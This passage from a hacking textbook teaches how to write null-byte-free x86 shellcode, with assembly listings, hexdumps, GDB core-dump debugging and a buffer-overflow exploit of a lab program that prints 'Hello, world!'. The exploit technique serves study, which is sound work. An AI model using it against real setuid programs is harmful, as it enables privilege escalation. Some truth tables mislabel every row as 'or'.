Shellcode is literally injected into a running program, where it takes over like a biological virus inside a cell. Since shellcode isn't really an executable program, we don't have the luxury of declaring the layout of data in memory or even using other memory segments. Our instructions must be self-contained and ready to take over control of the processor regardless of its current state. This is commonly referred to as
position-independent code.
In shellcode, the bytes for the string "Hello, world!" must be mixed together with the bytes for the assembly instructions, since there aren't definable or predictable memory segments. This is fine as long as EIP doesn't try to interpret the string as instructions. However, to access the string as data we need a pointer to it. When the shellcode gets executed, it could be anywhere in memory. The string's absolute memory address needs to be calculated relative to EIP. Since EIP cannot be accessed from assembly instructions, however, we need to use some sort of trick.
1. Assembly Instructions Using the Stack
The stack is so integral to the x86 architecture that there are special instructions for its operations.
Instruction | Description |
---|
push | Push the source operand to the stack. |
pop | Pop a value from the stack and store in the destination operand. |
call | Call a function, jumping the execution to the address in the location operand. This location can be relative or absolute. The address of the instruvtion following the call is pushed to the stack, so that execution can return later. |
ret | Return from a function, popping the return address from the stack and jumping execution there. |
Stack-based exploits are made possible by the call and ret instructions. When a function is called, the return address of the next instruction is pushed to the stack, beginning the stack frame. After the function is finished, the retinstruction pops the return address from the stack and jumps EIP back there. By overwriting the stored return address on the stack before the ret instruction, we can take control of a program's execution.
This architecture can be misused in another way to solve the problem of addressing the inline string data. If the string is placed directly after a call instruction, the address of the string will get pushed to the stack as the return address. Instead of calling a function, we can jump past the string to a popinstruction that will take the address off the stack and into a register. The following assembly instructions demonstrate this technique.
1.1. helloworld1.s
Code View:
BITS 32 ; Tell nasm this is 32-bit code.
call mark_below ; Call below the string to instructions
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.
mark_below:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; Pop the return address (string ptr) into ecx.
mov eax, 4 ; Write syscall #.
mov ebx, 1 ; STDOUT file descriptor
mov edx, 15 ; Length of the string
int 0x80 ; Do syscall: write(1, string, 14)
; void _exit(int status);
mov eax, 1 ; Exit syscall #
mov ebx, 0 ; Status = 0
int 0x80 ; Do syscall: exit(0)
The call instruction jumps execution down below the string. This also pushes the address of the next instruction to the stack, the next instruction in our case being the beginning of the string. The return address can immediately be popped from the stack into the appropriate register. Without using any memory segments, these raw instructions, injected into an existing process, will execute in a completely position-independent way. This means that, when these instructions are assembled, they cannot be linked into an executable.
Code View:
reader@hacking:~/booksrc $ nasm helloworld1.s
reader@hacking:~/booksrc $ ls -l helloworld1
-rw-r--r-- 1 reader reader 50 2007-10-26 08:30 helloworld1
reader@hacking:~/booksrc $ hexdump -C helloworld1
00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |.....Hello, worl|
00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!..Y...........|
00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |................|
00000030 cd 80 |..|
00000032
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000 E80F000000 call 0x14
00000005 48 dec eax
00000006 656C gs insb
00000008 6C insb
00000009 6F outsd
0000000A 2C20 sub al,0x20
0000000C 776F ja 0x7d
0000000E 726C jc 0x7c
00000010 64210A and [fs:edx],ecx
00000013 0D59B80400 or eax,0x4b859
00000018 0000 add [eax],al
0000001A BB01000000 mov ebx,0x1
0000001F BA0F000000 mov edx,0xf
00000024 CD80 int 0x80
00000026 B801000000 mov eax,0x1
0000002B BB00000000 mov ebx,0x0
00000030 CD80 int 0x80
reader@hacking:~/booksrc $
The nasm assembler converts assembly language into machine code and a corresponding tool called ndisasm converts machine code into assembly. These tools are used above to show the relationship between the machine code bytes and the assembly instructions. The disassembly instructions marked in bold are the bytes of the "Hello, world!" string interpreted as instructions.
Now, if we can inject this shellcode into a program and redirect EIP, the program will print out Hello, world! Let's use the familiar exploit target of the notesearch program.
Code View:
reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $
Failure. Why do you think it crashed? In situations like this, GDB is your best friend. Even if you already know the reason behind this specific crash, learning how to effectively use a debugger will help you solve many other problems in the future.
2. Investigating with GDB
Since the notesearch program runs as root, we can't debug it as a normal user. However, we also can't just attach to a running copy of it, because it exits too quickly. Another way to debug programs is with core dumps. From a root prompt, the OS can be told to dump memory when the program crashes by using the command ulimit -c unlimited. This means that dumped core files are allowed to get as big as needed. Now, when the program crashes, the memory will be dumped to disk as a core file, which can be examined using GDB.
Code View:
reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\
xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault (core dumped)
root@hacking:/home/reader/booksrc # ls -l ./core
-rw------- 1 root root 147456 2007-10-26 08:36 ./core
root@hacking:/home/reader/booksrc # gdb -q -c ./core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Core was generated by './notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.
Program terminated with signal 11, Segmentation fault.
#0 0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3: call 0x2c6541b7
0xbffff9a8: ins BYTE PTR es:[edi],[dx]
0xbffff9a9: outs [dx],DWORD PTR ds:[esi]
0xbffff9aa: sub al,0x20
0xbffff9ac: ja 0xbffffa1d
(gdb) i r eip
eip 0x2c6541b7 0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3: 0xe8 0x0f 0x48 0x65 0x6c 0x6c 0x6f 0x2c
0xbffff9ab: 0x20 0x77 0x6f 0x72 0x6c 0x64 0x21 0x0a
0xbffff9b3: 0x0d 0x59 0xb8 0x04 0xbb 0x01 0xba 0x0f
0xbffff9bb: 0xcd 0x80 0xb8 0x01 0xbb 0xcd 0x80 0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |.....Hello, worl|
00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!..Y...........|
00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |................|
00000030 cd 80 |..|
00000032
root@hacking:/home/reader/booksrc #
Once GDB is loaded, the disassembly style is switched to Intel. Since we are running GDB as root, the .gdbinit file won't be used. The memory where the shellcode should be is examined. The instructions look incorrect, but it seems like the first incorrect call instruction is what caused the crash. At least, execution was redirected, but something went wrong with the shellcode bytes. Normally, strings are terminated by a null byte, but here, the shell was kind enough to remove these null bytes for us. This, however, totally destroys the meaning of the machine code. Often, shellcode will be injected into a process as a string, using functions like strcpy(). Such functions will simply terminate at the first null byte, producing incomplete and unusable shellcode in memory. In order for the shellcode to survive transit, it must be redesigned so it doesn't contain any null bytes.
3. Removing Null Bytes
Looking at the disassembly, it is obvious that the first null bytes come from the call instruction.
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000 E80F000000 call 0x14
00000005 48 dec eax
00000006 656C gs insb
00000008 6C insb
00000009 6F outsd
0000000A 2C20 sub al,0x20
0000000C 776F ja 0x7d
0000000E 726C jc 0x7c
00000010 64210A and [fs:edx],ecx
00000013 0D59B80400 or eax,0x4b859
00000018 0000 add [eax],al
0000001A BB01000000 mov ebx,0x1
0000001F BA0F000000 mov edx,0xf
00000024 CD80 int 0x80
00000026 B801000000 mov eax,0x1
0000002B BB00000000 mov ebx,0x0
00000030 CD80 int 0x80
reader@hacking:~/booksrc $
This instruction jumps execution forward by 19 (0x13) bytes, based on the first operand. The call instruction allows for much longer jump distances, which means that a small value like 19 will have to be padded with leading zeros resulting in null bytes.
One way around this problem takes advantage of two's complement. A small negative number will have its leading bits turned on, resulting in 0xffbytes. This means that, if we call using a negative value to move backward in execution, the machine code for that instruction won't have any null bytes. The following revision of the helloworld shellcode uses a standard implementation of this trick: Jump to the end of the shellcode to a call instruction which, in turn, will jump back to a pop instruction at the beginning of the shellcode.
3.1. helloworld2.s
BITS 32 ; Tell nasm this is 32-bit code.
jmp short one ; Jump down to a call at the end.
two:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; Pop the return address (string ptr) into ecx.
mov eax, 4 ; Write syscall #.
mov ebx, 1 ; STDOUT file descriptor
mov edx, 15 ; Length of the string
int 0x80 ; Do syscall: write(1, string, 14)
; void _exit(int status);
mov eax, 1 ; Exit syscall #
mov ebx, 0 ; Status = 0
int 0x80 ; Do syscall: exit(0)
one:
call two ; Call back upwards to avoid null bytes
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.
After assembling this new shellcode, disassembly shows that the call instruction (shown in italics below) is now free of null bytes. This solves the first and most difficult null-byte problem for this shellcode, but there are still many other null bytes (shown in bold).
Code View:
reader@hacking:~/booksrc $ nasm helloworld2.s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000 EB1E jmp short 0x20
00000002 59 pop ecx
00000003 B804000000 mov eax,0x4
00000008 BB01000000 mov ebx,0x1
0000000D BA0F000000 mov edx,0xf
00000012 CD80 int 0x80
00000014 B801000000 mov eax,0x1
00000019 BB00000000 mov ebx,0x0
0000001E CD80 int 0x80
00000020 E8DDFFFFFF call 0x2
00000025 48 dec eax
00000026 656C gs insb
00000028 6C insb
00000029 6F outsd
0000002A 2C20 sub al,0x20
0000002C 776F ja 0x9d
0000002E 726C jc 0x9c
00000030 64210A and [fs:edx],ecx
00000033 0D db 0x0D
reader@hacking:~/booksrc $
These remaining null bytes can be eliminated with an understanding of register widths and addressing. Notice that the first jmp instruction is actually jmp short. This means execution can only jump a maximum of approximately 128 bytes in either direction. The normal jmp instruction, as well as the call instruction (which has no short version), allows for much longer jumps. The difference between assembled machine code for the two jump varieties is shown below:
EB 1E jmp short 0x20
versus
E9 1E 00 00 00 jmp 0x23
The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits in width. The E stands for extended, because these were originally 16-bit registers called AX, BX, CX, DX, SI, DI, BP, and SP. These original 16-bit versions of the registers can still be used for accessing the first 16 bits of each corresponding 32-bit register. Furthermore, the individual bytes of the AX, BX, CX, and DX registers can be accessed as 8-bit registers called AL, AH, BL, BH, CL, CH, DL, and DH, where L stands for low byte and H for high byte. Naturally, assembly instructions using the smaller registers only need to specify operands up to the register's bit width. The three variations of a mov instruction are shown below.
Machine code | Assembly |
---|
B8 04 00 00 00 | mov eax,0x4 |
66 B8 04 00 | mov ax,0x4 |
B0 04 | mov al,0x4 |
Using the AL, BL, CL, or DL register will put the correct least significant byte into the corresponding extended register without creating any null bytes in the machine code. However, the top three bytes of the register could still contain anything. This is especially true for shellcode, since it will be taking over another process. If we want the 32-bit register values to be correct, we need to zero out the entire register before the mov instructions—but this, again, must be done without using null bytes. Here are some more simple assembly instructions for your arsenal. These first two are small instructions that increment and decrement their operand by one.
Instruction | Description |
---|
inc | Increment the target operand by adding 1 to it. |
dec | Decrement the target operand by subtracting 1 from it. |
The next few instructions, like the mov instruction, have two operands. They all do simple arithmetic and bitwise logical operations between the two operands, storing the result in the first operand.
Instruction | Description |
---|
add , | Add the source operand to the destination operand, storing the result in the destination. |
sub , | Subtract the source operand from the destination operand, storing the result in the destination. |
or , |
Perform a bitwise or logic operation, comparing each bit of one operand with the corresponding bit of the other operand.
- 1 or 0 = 1
- 1 or 1 = 1
- 0 or 1 = 1
- 0 or 0 = 0
If the source bit or the destination bit is on, or if both of them are on, the result bit is on; otherwise, the result is off. The final result is stored in the destination operand. |
and , |
Perform a bitwise and logic operation, comparing each bit of one operand with the corresponding bit of the other operand.
- 1 or 0 = 0
- 1 or 1 = 1
- 0 or 1 = 0
- 0 or 0 = 0
The result bit is on only if both the source bit and the destination bit are on. The final result is stored in the destination operand.
|
xor , | Perform a bitwise exclusive or (xor) logical operation, comparing each bit of one operand with the corresponding bit of the other operand.
- 1 or 0 = 1
- 1 or 1 = 0
- 0 or 1 = 1
- 0 or 0 = 0
If the bits differ, the result bit is on; if the bits are the same, the result bit is off. The final result is stored in the destination operand. |
One method is to move an arbitrary 32-bit number into the register and then subtract that value from the register using the mov and sub instructions:
B8 44 33 22 11 mov eax,0x11223344
2D 44 33 22 11 sub eax,0x11223344
While this technique works, it takes 10 bytes to zero out a single register, making the assembled shellcode larger than necessary. Can you think of a way to optimize this technique? The DWORD value specified in each instruction comprises 80 percent of the code. Subtracting any value from itself also produces 0 and doesn't require any static data. This can be done with a single two-byte instruction:
29 C0 sub eax,eax
Using the sub instruction will work fine when zeroing registers at the beginning of shellcode. This instruction will modify processor flags, which are used for branching, however. For that reason, there is a preferred two-byte instruction that is used to zero registers in most shellcode. The xor instruction performs an ex clusive or operation on the bits in a register. Since 1 xor ed with 1 results in a 0, and 0 xored with 0 results in a 0, any value xor ed with itself will result in 0. This is the same result as with any value subtracted from itself, but the xor instruction doesn't modify processor flags, so it's considered to be a cleaner method.
31 C0 xor eax,eax
You can safely use the sub instruction to zero registers (if done at the beginning of the shellcode), but the xor instruction is most commonly used in shellcode in the wild. This next revision of the shellcode makes use of the smaller registers and the xor instruction to avoid null bytes. The inc and decinstructions have also been used when possible to make for even smaller shellcode.
3.2. helloworld3.s
BITS 32 ; Tell nasm this is 32-bit code.
jmp short one ; Jump down to a call at the end.
two:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; Pop the return address (string ptr) into ecx.
xor eax, eax ; Zero out full 32 bits of eax register.
mov al, 4 ; Write syscall #4 to the low byte of eax.
xor ebx, ebx ; Zero out ebx.
inc ebx ; Increment ebx to 1, STDOUT file descriptor.
xor edx, edx
mov dl, 15 ; Length of the string
int 0x80 ; Do syscall: write(1, string, 14)
; void _exit(int status);
mov al, 1 ; Exit syscall #1, the top 3 bytes are still zeroed.
dec ebx ; Decrement ebx back down to 0 for status = 0.
int 0x80 ; Do syscall: exit(0)
one:
call two ; Call back upwards to avoid null bytes
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.
After assembling this shellcode, hexdump and grep are used to quickly check it for null bytes.
Code View:
reader@hacking:~/booksrc $ nasm helloworld3.s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0f cd 80 |..Y1...1.C1.....|
00000010 b0 01 4b cd 80 e8 e8 ff ff ff 48 65 6c 6c 6f 2c |..K.......Hello,|
00000020 20 77 6f 72 6c 64 21 0a 0d | world!..|
00000029
reader@hacking:~/booksrc $
Now this shellcode is usable, as it doesn't contain any null bytes. When used with an exploit, the notesearch program is coerced into greeting the world like a newbie.
Code View:
reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9bc
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking :~/booksrc $